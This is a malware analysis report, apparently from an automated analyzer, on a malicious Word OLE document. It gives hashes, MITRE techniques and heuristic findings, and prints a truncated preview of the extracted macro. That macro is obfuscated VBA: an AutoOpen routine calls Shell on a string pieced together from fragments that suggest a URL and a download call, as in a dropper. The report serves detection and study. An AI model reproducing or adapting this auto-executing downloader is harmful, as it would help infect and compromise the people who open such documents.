Office (OLE) malware analysis — malicious · 26ba22e27ab95972

MALICIOUS

Office (OLE)

171.7 KB First seen: 2018-01-08

MD5: 3086e01e76450e6493c74a7f51029038 SHA-1: 4be3bd22dd9ed7104ad43378fcf034ae37115645 SHA-256: 26ba22e27ab95972f237889c79ca59c54cf62325e9b53878ecfe1db5a8a05d65

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious OLE file containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, indicating it's designed to download and run a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its role as a dropper for phishing lures.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 73465 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	73465 bytes
SHA-256: `787b4b9767a63d92cc73038c582512d149469b3be1bc57e0987cc720eb350151`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "rWMpvVU" Sub AutoOpen() WjdhpBfacRIzO = "pGHKnVzanjI" + "wuOWiwMvcOsCW" + "XJzYWAmJEduaWi" + "wszYwDlLFjMkS" + "aNEotwq" + "PKIEpplcIah" + "jVviXpm" + "rpKQTIdPplcjAS" + "nQtOvadalCN" + "FRaQDMslaz" + "ljMVmWzBENsIN" + "brXOOYNFnYz" UYUIjDnYI = "iFqDnBJGNJNm" + "UUXLaijsoXX" + "ZjwhoUo" + "tISXKkLwhK" + "ChvznJrMtcpuh" + "BOVMZYoYR" + "MCzBqTkLdjVU" + "hJXzIutEOlE" + "WqjImzdQ" + "mkJqWardQ" + "wjknDBajdXiwRv" + "TcACqkrEQuYNH" UBaznGclCfGM = "zsjoTOzCz" + "bZMGcUtfnTvJV" + "AdpPhaV" + "iRsLhFFzJiWKzX" + "zARJASsXpXf" + "pZhUXWivuOQmo" + "oKMnLDcDpPQ" + "VdluCoCRP" + "bOzoUcflji" + "ZdiLCMbLlk" + "EGBAJALck" + "KOiwoWjAXD" lwvADjzcaFd = "JJtnUSfaHuwPO" + "NOpsKOjmSJFAGR" + "AKQjZZou" + "OhrdYrwjlDVl" + "iuPJWqjhTMOO" + "khipaYTF" + "dWCObLZPDva" + "bVRQDzLBv" + "dPQHRzvczR" + "ERsGHOYIDISn" + "ILRZWaIEiHsnzU" + "bUawJjXEYJvimt" VBA.Shell$ MXHNMRsDav, 0 MLcWwFjVGWIcW = "zSJuijji" + "dNlGsPbrVK" + "vhLbVovwUbAEA" + "YqloIMHiqwJNwn" + "iinRfOS" + "iYpklOtd" + "kMTZpDMz" + "RqNRIpIspwNm" + "jGjCQTcWPz" + "AdmTjpbaUw" + "buRQActYwPWOjM" + "mntVMBtsQiCpL" VmSZjfp = "zTAdrBFiPGGr" + "nhwjviB" + "lzmhYac" + "pzhABnZ" + "jJrmmPwiUw" + "FTpnznkNWNvT" + "daZJZqAzHdA" + "qPOWAENZsXkA" + "jMQZDHnq" + "JLpnJdziw" + "pBGYWrVJitjFq" + "zpijaDVMva" CjNujbJ = "tKIdouiiwF" + "jDVQnUzOIuUcFf" + "TKIOwSZjw" + "qLpprVWHw" + "ChQZakNBiYiCzW" + "YZkGiGWYBwI" + "ZQYzVGlP" + "tioOEXCXjoOS" + "TwmAUnfIP" + "RaokGaMvMGp" + "qvsaiUBUIuq" + "zcLUmzkd" End Sub Function MXHNMRsDav() PsdOVr = IsNull("ivboFwGfhrZKc") + IsNull("JqfiNZfIW") + IsNull("oCifowNt") + IsNull("kvTzNrvKKR") + IsNull("JmHAhOKlTSN") + IsNull("YUACRaqldf") + IsNull("rXqsRrSOVrszC") uaHVDzPt = IsNull("MmNIjOwsNCq") + IsNull("nnvNSujUqNP") + IsNull("WznjOmnRZr") + IsNull("iYTYAXGtYPhfFr") + IsNull("IsplmwXtlh") + IsNull("MdaOZCwrRpz") + IsNull("iwjTrEpThs") OWiEWRrVE = Mid("720Fu23Xz3NTHd80ittp://Z0r+Z0rhZ0r+Z0reg0iEc971HfS7O1IqonojOsdHs", 16, 27) fzOlJwQcXMM = IsNull("dwalcaCXavdNod") + IsNull("TjBiwPdqVttB") + IsNull("rijWwHo") + IsNull("PzAFnUwvOED") + IsNull("fBKrTFfAHEsjZ") + IsNull("fvPGOjpHEjAYJv") + IsNull("vHoqLYqUpDsb") ELKjYR = IsNull("tjCLQolq") + IsNull("VNhLOzAP") + IsNull("CpiKtDTEZjwb") + IsNull("VimEYVrJI") + IsNull("lnEAzTQWJKWFPf") + IsNull("nwsLOCsfDrwZ") + IsNull("biYcursX") nKJtm = IsNull("ULHRjnoBfIpWA") + IsNull("zdquwkTMzD") + IsNull("NbpbaDWEBnsZi") + IsNull("VGfPwzUKAsqwI") + IsNull("rUINDYSMzaFFTR") + IsNull("kEEIBadnwwEYCa") + IsNull("kbuaNjffVJaIHE") IqAWwuNllF = Mid("h1C0r+Z0r.Z0r+Z0r'+'comZ0r+g0i+g0iZ0r.br/ERreZ0r+Z0rNDZ0r+Z0r/,hZ0r+Z0r'+'g0i+gdrGUfropOhqWTqLaIQc", 5, 75) zzkZrmPAq = IsNull("DUlINoQvQTGVl") + IsNull("zztvtHBIBt") + IsNull("ufmuLXn") + IsNull("wvXaFpDP") + IsNull("aiSoqHYi") + IsNull("vwQnvTs") + IsNull("SJdBFwT") brhZDswU = IsNull("McCaRbGNSI") + IsNull("GqwNrwi") + IsNull("jzuJqNZSZljQla") + IsNull("bXqppWj") + IsNull("DJjBZWvSY") + IsNull("diVSSMNsJhbjr") + IsNull("jkUpAIoaz") VtIAMvki = IsNull("mcbXnFqr") + IsNull("hXaSEYOPKcouL") + IsNull("EhDXumHVizdDfz") + IsNull("MpIYuNvR") + IsNull("OkPluTiQbcWp") + IsNull("ivFlMpaoAtQH") + IsNull("nfVRlIQSJJWVaO") zcziisdj = Mid("im3jnlSRwIM0JLSJ4GhBwZ0rStrZ0r+Z0ring(), DZ0r+Z0rig0i+g0iZ0r+Z0rOZ0r+Z0rg0i+g0ihuZ01GqBjUjFPP", 22, 62) scwAhzQA = IsNull("rAGLAvdTKZHr") + IsNull("JFiczMwqTRTV") + IsNull("BGRQCDjobRFCs") + IsNull("EIZRIoALk") + IsNull("fqNAqXjmqL") + IsNull("XBtWEIwhnZaFzu") + IsNull("uzLjoqVvkMpi") UMpjdm = IsNull("FQMOPic") + IsNull("UStiLfIoOskNO") + IsNull("WtYZBssABJ") + IsNull("zmaiwTK") + IsNull("TKBPHiw") + IsNull("oVvMtmmtTqpjkA") + IsNull("RkiMsiKQZ") NtBtAmBXhp = IsNull("EiSLjThGfvDjDd") + IsNull("wFlOFHcjbJWDBG") + IsNull("KOZzcEGO") + IsNull("fNcPEHAkMX") + IsNull("fbbcrbwqCKQfzW") + IsNull("oGGAsqqMisiN") + IsNull("UJlqdHdjnzG") ansmlVc = Mid( ... (truncated)

SHA-256: 787b4b9767a63d92cc73038c582512d149469b3be1bc57e0987cc720eb350151

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rWMpvVU"
Sub AutoOpen()
WjdhpBfacRIzO = "pGHKnVzanjI" + "wuOWiwMvcOsCW" + "XJzYWAmJEduaWi" + "wszYwDlLFjMkS" + "aNEotwq" + "PKIEpplcIah" + "jVviXpm" + "rpKQTIdPplcjAS" + "nQtOvadalCN" + "FRaQDMslaz" + "ljMVmWzBENsIN" + "brXOOYNFnYz"
UYUIjDnYI = "iFqDnBJGNJNm" + "UUXLaijsoXX" + "ZjwhoUo" + "tISXKkLwhK" + "ChvznJrMtcpuh" + "BOVMZYoYR" + "MCzBqTkLdjVU" + "hJXzIutEOlE" + "WqjImzdQ" + "mkJqWardQ" + "wjknDBajdXiwRv" + "TcACqkrEQuYNH"
UBaznGclCfGM = "zsjoTOzCz" + "bZMGcUtfnTvJV" + "AdpPhaV" + "iRsLhFFzJiWKzX" + "zARJASsXpXf" + "pZhUXWivuOQmo" + "oKMnLDcDpPQ" + "VdluCoCRP" + "bOzoUcflji" + "ZdiLCMbLlk" + "EGBAJALck" + "KOiwoWjAXD"
lwvADjzcaFd = "JJtnUSfaHuwPO" + "NOpsKOjmSJFAGR" + "AKQjZZou" + "OhrdYrwjlDVl" + "iuPJWqjhTMOO" + "khipaYTF" + "dWCObLZPDva" + "bVRQDzLBv" + "dPQHRzvczR" + "ERsGHOYIDISn" + "ILRZWaIEiHsnzU" + "bUawJjXEYJvimt"
VBA.Shell$ MXHNMRsDav, 0
MLcWwFjVGWIcW = "zSJuijji" + "dNlGsPbrVK" + "vhLbVovwUbAEA" + "YqloIMHiqwJNwn" + "iinRfOS" + "iYpklOtd" + "kMTZpDMz" + "RqNRIpIspwNm" + "jGjCQTcWPz" + "AdmTjpbaUw" + "buRQActYwPWOjM" + "mntVMBtsQiCpL"
VmSZjfp = "zTAdrBFiPGGr" + "nhwjviB" + "lzmhYac" + "pzhABnZ" + "jJrmmPwiUw" + "FTpnznkNWNvT" + "daZJZqAzHdA" + "qPOWAENZsXkA" + "jMQZDHnq" + "JLpnJdziw" + "pBGYWrVJitjFq" + "zpijaDVMva"
CjNujbJ = "tKIdouiiwF" + "jDVQnUzOIuUcFf" + "TKIOwSZjw" + "qLpprVWHw" + "ChQZakNBiYiCzW" + "YZkGiGWYBwI" + "ZQYzVGlP" + "tioOEXCXjoOS" + "TwmAUnfIP" + "RaokGaMvMGp" + "qvsaiUBUIuq" + "zcLUmzkd"
End Sub
Function MXHNMRsDav()
PsdOVr = IsNull("ivboFwGfhrZKc") + IsNull("JqfiNZfIW") + IsNull("oCifowNt") + IsNull("kvTzNrvKKR") + IsNull("JmHAhOKlTSN") + IsNull("YUACRaqldf") + IsNull("rXqsRrSOVrszC")
uaHVDzPt = IsNull("MmNIjOwsNCq") + IsNull("nnvNSujUqNP") + IsNull("WznjOmnRZr") + IsNull("iYTYAXGtYPhfFr") + IsNull("IsplmwXtlh") + IsNull("MdaOZCwrRpz") + IsNull("iwjTrEpThs")
OWiEWRrVE = Mid("720Fu23Xz3NTHd80ittp://Z0r+Z0rhZ0r+Z0reg0iEc971HfS7O1IqonojOsdHs", 16, 27)
fzOlJwQcXMM = IsNull("dwalcaCXavdNod") + IsNull("TjBiwPdqVttB") + IsNull("rijWwHo") + IsNull("PzAFnUwvOED") + IsNull("fBKrTFfAHEsjZ") + IsNull("fvPGOjpHEjAYJv") + IsNull("vHoqLYqUpDsb")
ELKjYR = IsNull("tjCLQolq") + IsNull("VNhLOzAP") + IsNull("CpiKtDTEZjwb") + IsNull("VimEYVrJI") + IsNull("lnEAzTQWJKWFPf") + IsNull("nwsLOCsfDrwZ") + IsNull("biYcursX")
nKJtm = IsNull("ULHRjnoBfIpWA") + IsNull("zdquwkTMzD") + IsNull("NbpbaDWEBnsZi") + IsNull("VGfPwzUKAsqwI") + IsNull("rUINDYSMzaFFTR") + IsNull("kEEIBadnwwEYCa") + IsNull("kbuaNjffVJaIHE")
IqAWwuNllF = Mid("h1C0r+Z0r.Z0r+Z0r'+'comZ0r+g0i+g0iZ0r.br/ERreZ0r+Z0rNDZ0r+Z0r/,hZ0r+Z0r'+'g0i+gdrGUfropOhqWTqLaIQc", 5, 75)
zzkZrmPAq = IsNull("DUlINoQvQTGVl") + IsNull("zztvtHBIBt") + IsNull("ufmuLXn") + IsNull("wvXaFpDP") + IsNull("aiSoqHYi") + IsNull("vwQnvTs") + IsNull("SJdBFwT")
brhZDswU = IsNull("McCaRbGNSI") + IsNull("GqwNrwi") + IsNull("jzuJqNZSZljQla") + IsNull("bXqppWj") + IsNull("DJjBZWvSY") + IsNull("diVSSMNsJhbjr") + IsNull("jkUpAIoaz")
VtIAMvki = IsNull("mcbXnFqr") + IsNull("hXaSEYOPKcouL") + IsNull("EhDXumHVizdDfz") + IsNull("MpIYuNvR") + IsNull("OkPluTiQbcWp") + IsNull("ivFlMpaoAtQH") + IsNull("nfVRlIQSJJWVaO")
zcziisdj = Mid("im3jnlSRwIM0JLSJ4GhBwZ0rStrZ0r+Z0ring(), DZ0r+Z0rig0i+g0iZ0r+Z0rOZ0r+Z0rg0i+g0ihuZ01GqBjUjFPP", 22, 62)
scwAhzQA = IsNull("rAGLAvdTKZHr") + IsNull("JFiczMwqTRTV") + IsNull("BGRQCDjobRFCs") + IsNull("EIZRIoALk") + IsNull("fqNAqXjmqL") + IsNull("XBtWEIwhnZaFzu") + IsNull("uzLjoqVvkMpi")
UMpjdm = IsNull("FQMOPic") + IsNull("UStiLfIoOskNO") + IsNull("WtYZBssABJ") + IsNull("zmaiwTK") + IsNull("TKBPHiw") + IsNull("oVvMtmmtTqpjkA") + IsNull("RkiMsiKQZ")
NtBtAmBXhp = IsNull("EiSLjThGfvDjDd") + IsNull("wFlOFHcjbJWDBG") + IsNull("KOZzcEGO") + IsNull("fNcPEHAkMX") + IsNull("fbbcrbwqCKQfzW") + IsNull("oGGAsqqMisiN") + IsNull("UJlqdHdjnzG")
ansmlVc = Mid(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.